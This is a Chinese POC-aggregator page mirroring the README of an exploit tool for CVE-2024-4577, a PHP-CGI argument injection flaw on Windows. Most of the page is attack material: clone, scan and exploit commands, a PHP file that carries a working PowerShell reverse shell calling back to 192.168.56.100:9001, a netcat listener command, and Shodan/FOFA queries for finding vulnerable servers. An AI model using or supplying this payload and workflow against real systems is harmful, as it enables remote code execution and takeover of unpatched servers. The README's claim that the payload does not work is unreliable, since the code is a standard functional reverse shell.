POC详情: 56b065050abcf7eedefef90378e53d3a1f4b5cff

来源
https://github.com/gh-ost00/CVE-2024-4577-RCE
关联漏洞
标题: PHP 操作系统命令注入漏洞 (CVE-2024-4577)
描述:PHP是一种在服务器端执行的脚本语言。 PHP存在操作系统命令注入漏洞,该漏洞源于在特定条件下,Windows系统使用“Best-Fit”行为替换命令行中的字符,这可能导致PHP CGI模块错误地将这些字符解释为PHP选项,从而泄露脚本的源代码,在服务器上运行任意PHP代码等。以下版本受到影响:8.1至8.1.29之前版本,8.3至8.3.8之前版本,8.2至8.2.20之前版本。
描述
PHP CGI Argument Injection (CVE-2024-4577) RCE
介绍
<h1 align="center">
  PHP CGI Argument Injection (CVE-2024-4577) RCE 
</h2>

## 📜 Description 

In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.

"XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target
an explloit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode."
 
## 🛠️ Installation 
```bash
$ git clone https://github.com/fa-rrel/CVE-2024-4577-RCE/
$ cd CVE-2024-4577-RCE && pip install -r requirements.txt 
```
## ⚙️ Usage
$ python3 CVE-2024-4577.py -s -t https://target.com/
## 🤖 Establishing reverse shell 

### PHP Payload
> [!NOTE]
> This tool demonstrates realistic attack and techniques (TTPs). However this specific payload sample does not function in this scenario. Modify the shell.php to obtain fully functional payload.
```php
# rev_shell.php
<?php
$payload = "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('192.168.56.100', 9001);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\";

exec($payload);
?>
 
```
## 🖥️ Scanning server
```bash
$ python3 CVE-2024-4577.py -s -t https://target.com/                                                   
  ______     _______   ____   ___ ____  _  _         _  _  ____ _____ _____ 
 / ___\ \   / / ____| |___ \ / _ \___ \| || |       | || || ___|___  |___  |
| |    \ \ / /|  _|     __) | | | |__) | || |_ _____| || ||___ \  / /   / / 
| |___  \ V / | |___   / __/| |_| / __/|__   _|_____|__   _|__) |/ /   / /  
 \____|  \_/  |_____| |_____|\___/_____|  |_|          |_||____//_/   /_/    
Author: Ghost_sec | Youtube.com/Ghost_sec | Github.com/fa-rrel | POC & Scanning  

[+] Target https://target.com is vulnerable to CVE-2024-4577
```

## 🎯 Exploiting Vulnerable server
```bash
$ python3 CVE-2024-4577.py -t {targetsite.txt} -e -p rev_shell.php
                                                  
 ______     _______   ____   ___ ____  _  _         _  _  ____ _____ _____ 
 / ___\ \   / / ____| |___ \ / _ \___ \| || |       | || || ___|___  |___  |
| |    \ \ / /|  _|     __) | | | |__) | || |_ _____| || ||___ \  / /   / / 
| |___  \ V / | |___   / __/| |_| / __/|__   _|_____|__   _|__) |/ /   / /  
 \____|  \_/  |_____| |_____|\___/_____|  |_|          |_||____//_/   /_/    
Author: Ghost_sec | Youtube.com/Ghost_sec | Github.com/fa-rrel | POC & Scanning  

[+] Exploit successful!
```

## 👨🏻‍💻 Netcat Listener
```bash
$ nc -lvnp 9001
```

## 🔍 Discovering vulnerable host
- **Shodan**: `server: PHP 8.1`, `server: PHP 8.2`, `server: PHP 8.3`
- **FOFA**: `protocol="http" && header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3"`
## 💁 References
- https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577
- https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2024/CVE-2024-4577.yaml
- http://www.openwall.com/lists/oss-security/2024/06/07/1
- https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
- https://www.php.net/ChangeLog-8.php#8.1.29
- https://www.php.net/ChangeLog-8.php#8.2.20
- https://www.php.net/ChangeLog-8.php#8.3.8
- https://github.com/l0n3m4n/CVE-2024-4577-RCE/

## ⚠️ Disclaimer 
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool.
文件快照

 [4.0K]  /data/pocs/56b065050abcf7eedefef90378e53d3a1f4b5cff
├── [3.6K]  CVE-2024-4577.py
├── [4.2K]  README.md
└── [  33]  requirements.txt

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。